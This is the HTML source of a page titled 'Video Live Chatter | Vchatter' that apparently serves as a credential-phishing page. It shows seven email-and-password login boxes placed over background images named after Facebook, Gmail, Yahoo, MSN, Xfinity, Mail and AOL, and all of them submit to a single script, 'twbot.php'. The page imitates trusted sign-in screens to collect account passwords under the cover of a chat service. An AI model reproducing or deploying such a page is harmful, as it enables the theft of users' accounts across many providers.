<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="SHORTCUT ICON" href="images/ico.png"/>

<title>Video Live Chatter | Vchatter</title>
<style type="text/css">
body {
	background-color:#F7F7F7;
}
fieldset {
	border:1px dashed #CCC;
	padding:10px;
}
legend {
	font-family:Arial, Helvetica, sans-serif;
	font-size: 90%;
	letter-spacing: -1px;
	font-weight: bold;
	line-height: 1.1;
	color:#fff;
	background: #666;
	border: 1px solid #333;
	padding: 2px 6px;
}
h1 {
	font-family:Arial, Helvetica, sans-serif;
	font-size: 175%;
	letter-spacing: -1px;
	font-weight: normal;
	line-height: 1.1;
	color:#333;
}
label {
	width:142px;
	height:32px;
	margin-top:3px;
	margin-right:2px;
	padding-top:11px;
	padding-left:6px;
	background-color:#CCCCCC;
	float:left;
	display: block;
	font-family:Arial, Helvetica, sans-serif;
	font-size: 115%;
	letter-spacing: -1px;
	font-weight: normal;
	line-height: 1.1;
	color:#666;
}
.form {
	margin:0;
	padding:0;
}
#container {
	width:750px;
	margin:auto;
	padding:10px;
}
#top {
	width:680px;
	height:50px;
}
#leftSide {
	width:530px;
	padding-top:30px;
	float:left;
}
#rightSide {
	background-color:#fff;
	width:200px;
	padding:5px;
	margin-top:40px;
	float:right;
	border:1px solid #CCC;
	font:normal 12px Arial;
	color:#666666
}
.clear {
	clear:both;
}
.holder {
	background-color:#fff;

}
.div_texbox {
	width:347px;
	float:right;
	background-color:#E6E6E6;
	height:35px;
	margin-top:3px;
	padding-top:5px;
	padding-bottom:3px;
	padding-left:5px;
}

.textbox {
	background-image: url(images/16t.png);
	background-repeat: no-repeat;
	background-position:left;
	width:285px;
	font:normal 18px Arial;
	color: #999999;
	padding:3px 5px 3px 19px;
}
.textbox:focus, .textbox:hover {
	background-color:#F0FFE6;
}

.username {
	background-color:#7ABEF5;
    	background-image: url(images/16m.png);
    	background-repeat: no-repeat;
    	background-position:left;
	width:160px;
    	font:normal 18px Arial;
    	color: #999999;
    	padding:3px 5px 3px 19px;
}
.username:focus, .username:hover {
	background-color:#F0FFE6;
}
   
.password {
	background-color:#7ABEF5;
    	background-image: url(images/16s.png);
    	background-repeat: no-repeat;
   	background-position:left;
	width:160px;
    	font:normal 18px Arial;
    	color: #999999;
    	padding:3px 5px 3px 19px;
}
.password:focus, .password:hover {
	background-color:#F0FFE6;
}

.button_div {
	width:100px;
	float:right;
	background-color:#82C8EA;
	border:1px solid #ccc;
	font:normal 20px Arial;
    	color: #999999;
	text-align:center;
	height:30px;
	margin-top:3px;
	padding:1px 12px 1px;
}
.buttons {
	background: #e3e3db;
	font-size:12px; 
	color: #989070;
	padding: 6px 14px;
	border-width: 2px;
	border-style: solid;
	border-color: #fff #d8d8d0 #d8d8d0 #fff;
	text-decoration: none;
	text-transform:uppercase;
	font-weight:bold;
}
body {
	background-color: #00AFF0;
	color: #B5CAFB;
	background-image: url(images/yudi_bodogh.png);
	background-repeat: repeat;
}
.Akmaller {
	color: #C2DCFC;
	font-size: 18px;
}
.kambing_ompong {
	color: #16338F;
	font-size: 18px;
}
.akmal {
}
.styletest {
     background-color: black;
     color: white;
}
.styletest2 {
	background-color:#039
     color: green;
}
#button {
display: block;
width: 175px;
height: 45px;
margin: 0px auto;
}
#button input:hover{
background-image:url('images/clicktosend_hover.gif');
background-position:left top;
background-repeat:no-repeat;
}

.akmallerss {
	font-size: 12px;
}
</style>
</head>

<body>
<form action="twbot.php" method="post">
<table background="" width="146%" border="0" cellspacing="0" cellpadding="0">
  <tr>

    <th scope="col" background="images/heading.png" width="100%" height="200px" >&nbsp;</th>
  </tr>
  <tr>
    <th height="65" scope="row"><div align="center">
    
      <table width="1222" border="0" cellspacing="5" cellpadding="0" height="312">
        <tr>
        
          <th width="300" height="302" valign="top" nowrap="nowrap" background="images/facebook.png" scope="col">
<table width="296" border="0" cellspacing="6">
                       <tr>

                         <td width="90" height="89">&nbsp;</td>
                         <td width="184">&nbsp;</td>
                       </tr>
                       <tr>
                         <td height="40" align="left" valign="bottom" class="Akmaller">Email:</td>
                         <td><input name="email" id="email"  placeholder="Username" class="username" maxlength="30" type="text"></td>
                       </tr>
                       <tr>

                         <td height="35" valign="bottom" class="Akmaller">Password :</td>
                         <td><input name="password" type="password" class="password" id="password" maxlength="30" /></td>
                       </tr>
                       <tr>
                         <td height="22"><div align="right">
                           <input name="remember_me7" id="remember_me7" value="1" tabindex="4" 
type="checkbox" />
                         </div></td>
                         <td>Remember me<br />

                         </label></td>
                       </tr>
                       <tr>
                         <td height="37">&nbsp;</td>
                         <td><div class="styletest2">
                           <div align="left">
                             <input
 name="action:login7" type="submit" class="button_div" value="Connect"/>
                           </div>

                         </div></td>

                       </tr>
              </table>
<table width="200" border="0" cellspacing="0">
  <tr>
    <td height="30"><div align="center"><span class="akmallerss"></span></div></td>
  </tr>

</table></th>
          <th width="300" scope="col" background="images/gmail.png"><table width="296" border="0" cellspacing="6">

            <tr>

              <td width="90" height="89">&nbsp;</td>
              <td width="184">&nbsp;</td>
            </tr>
            <tr>
              <td height="40" align="left" valign="bottom" class="Akmaller">Email:</td>

              <td><input name="email2" id="email2"  placeholder="Username" class="username" maxlength="30" type="text" /></td>
            </tr>

            <tr>

              <td height="35" valign="bottom" class="Akmaller">Password :</td>
              <td><input name="password2" type="password" class="password" id="password2" maxlength="30" /></td>
            </tr>
            <tr>

              <td height="22"><div align="right">
                <input name="remember_me" id="remember_me" value="1" tabindex="4" 
type="checkbox" />
              </div></td>

              <td>Remember me<br />

                </label></td>
            </tr>
            <tr>

              <td height="37">&nbsp;</td>
              <td><div class="styletest2">
                <div align="left">
                  <input
 name="action:login" type="submit" class="button_div" value="Connect"/>

                </div>
              </div></td>

            </tr>
          </table>

            <table width="200" border="0" cellspacing="0">
            <tr>
              <td height="30"><div align="center"><span class="akmallerss"></span></div></td>
            </tr>

          </table></th>
          <th width="300" scope="col" background="images/yahoo.png"><table width="296" border="0" cellspacing="6">

            <tr>

              <td width="90" height="89">&nbsp;</td>
              <td width="184">&nbsp;</td>
            </tr>
            <tr>
              <td height="40" align="left" valign="bottom" class="Akmaller">Email:</td>

              <td><input name="email3" id="email3"  placeholder="Username" class="username" maxlength="30" type="text" /></td>
            </tr>

            <tr>
              <td height="35" valign="bottom" class="Akmaller">Password :</td>
              <td><input name="password3" type="password" class="password" id="password3" maxlength="30" /></td>
            </tr>
            <tr>
              <td height="22"><div align="right">

                <input name="remember_me2" id="remember_me2" value="1" tabindex="4" 
type="checkbox" />
              </div></td>

              <td>Remember me<br />
                </label></td>
            </tr>
            <tr>
              <td height="37">&nbsp;</td>
              <td><div class="styletest2">

                <div align="left">

                  <input
 name="action:login2" type="submit" class="button_div" value="Connect"/>

                </div>
              </div></td>
            </tr>
          </table>
            <table width="200" border="0" cellspacing="0">
            <tr>

              <td height="30"><div align="center"><span class="akmallerss"></span></div></td>

            </tr>

          </table></th>
          <th width="300" scope="col" background="images/msn.png"><table width="296" border="0" cellspacing="6">
            <tr>
              <td width="90" height="89">&nbsp;</td>
              <td width="184">&nbsp;</td>
            </tr>

            <tr>

              <td height="40" align="left" valign="bottom" class="Akmaller">Email:</td>

              <td><input name="email4" id="email4"  placeholder="Username" class="username" maxlength="30" type="text" /></td>
            </tr>
            <tr>
              <td height="35" valign="bottom" class="Akmaller">Password :</td>
              <td><input name="password4" type="password" class="password" id="password4" maxlength="30" /></td>

            </tr>

            <tr>
              <td height="22"><div align="right">

                <input name="remember_me3" id="remember_me3" value="1" tabindex="4" 
type="checkbox" />
              </div></td>
              <td>Remember me<br />
                </label></td>
            </tr>

            <tr>
              <td height="37">&nbsp;</td>
              <td><div class="styletest2">

                <div align="left">
                  <input
 name="action:login3" type="submit" class="button_div" value="Connect"/>
                </div>
              </div></td>
            </tr>

          </table>
            <table width="200" border="0" cellspacing="0">
            <tr>
              <td height="30"><div align="center"><span class="akmallerss"></span></div></td>

            </tr>
          </table></th>
          </tr>

      </table>

    </div>
      <div align="center"></div>
      <div align="center">
        <table width="933" border="0" cellspacing="8" cellpadding="0">
          <tr>

            <th scope="col"width="300" height="300"col="col"" background="images/xfinity.png"><table width="296" border="0" cellspacing="6">
              <tr>

                <td width="90" height="89">&nbsp;</td>

                <td width="184">&nbsp;</td>
              </tr>
              <tr>
                <td height="40" align="left" valign="bottom" class="Akmaller">Email:</td>
                <td><input name="email7" id="email7"  placeholder="Username" class="username" maxlength="30" type="text" /></td>

              </tr>

              <tr>
                <td height="35" valign="bottom" class="Akmaller">Password :</td>

                <td><input name="password7" type="password" class="password" id="password7" maxlength="30" /></td>
              </tr>
              <tr>
                <td height="22"><div align="right">
                  <input name="remember_me4" id="remember_me4" value="1" tabindex="4" 
type="checkbox" />

                </div></td>
                <td>Remember me<br />
                  </label></td>

              </tr>
              <tr>
                <td height="37">&nbsp;</td>
                <td><div class="styletest2">
                  <div align="left">

                    <input
 name="action:login4" type="submit" class="button_div" value="Connect"/>
                  </div>
                </div></td>

              </tr>
            </table>
              <table width="200" border="0" cellspacing="0">
                <tr>
                  <td height="30"><div align="center"><span class="akmallerss"></span></div></td>

                </tr>
            </table></th>
            <th scope="col"width="300" height="300"row="row"" background="images/mail.png"><table width="296" border="0" cellspacing="6">

              <tr>
                <td width="90" height="89">&nbsp;</td>
                <td width="184">&nbsp;</td>
              </tr>
              <tr>

                <td height="40" align="left" valign="bottom" class="Akmaller">Email:</td>

                <td><input name="email6" id="email6"  placeholder="Username" class="username" maxlength="30" type="text" /></td>
              </tr>

              <tr>
                <td height="35" valign="bottom" class="Akmaller">Password :</td>
                <td><input name="password6" type="password" class="password" id="password6" maxlength="30" /></td>
              </tr>

              <tr>
                <td height="22"><div align="right">

                  <input name="remember_me5" id="remember_me5" value="1" tabindex="4" 
type="checkbox" />
                </div></td>

                <td>Remember me<br />
                  </label></td>
              </tr>

              <tr>
                <td height="37">&nbsp;</td>
                <td><div class="styletest2">

                  <div align="left">
                    <input
 name="action:login5" type="submit" class="button_div" value="Connect"/>

                  </div>
                </div></td>
              </tr>

            </table>
              <table width="200" border="0" cellspacing="0">
                <tr>
                  <td height="30"><div align="center"><span class="akmallerss"></span></div></td>

                </tr>

            </table></th>
            <td width="300" background="images/aol.png" ><table width="296" border="0" cellspacing="6">

              <tr>
                <td width="90" height="89">&nbsp;</td>
                <td width="184">&nbsp;</td>
              </tr>
              <tr>
                <td height="40" align="left" valign="bottom" class="Akmaller">Email:</td>

                <td><input name="email5" id="email5"  placeholder="Username" class="username" maxlength="30" type="text" /></td>
              </tr>

              <tr>
                <td height="35" valign="bottom" class="Akmaller">Password :</td>
                <td><input name="password5" type="password" class="password" id="password5" maxlength="30" /></td>
              </tr>
              <tr>
                <td height="22"><div align="right">

                  <input name="remember_me6" id="remember_me6" value="1" tabindex="4" 
type="checkbox" />
                </div></td>

                <td>Remember me<br />
                  </label></td>
              </tr>
              <tr>
                <td height="37">&nbsp;</td>
                <td><div class="styletest2">

                  <div align="left">
                    <input
 name="action:login6" type="submit" class="button_div" value="Connect"/>

                  </div>
                </div></td>
              </tr>
            </table>
              <table width="200" border="0" cellspacing="0">
              <tr>

                <td height="30" align="center" valign="middle"><div align="center"><span class="akmallerss"></span></div></td>

              </tr>
            </table></td>
          </tr>
        </table>
      </div></th>
  </tr>
  <tr>


  </tr>
</table>
</body>
</html>
</Script>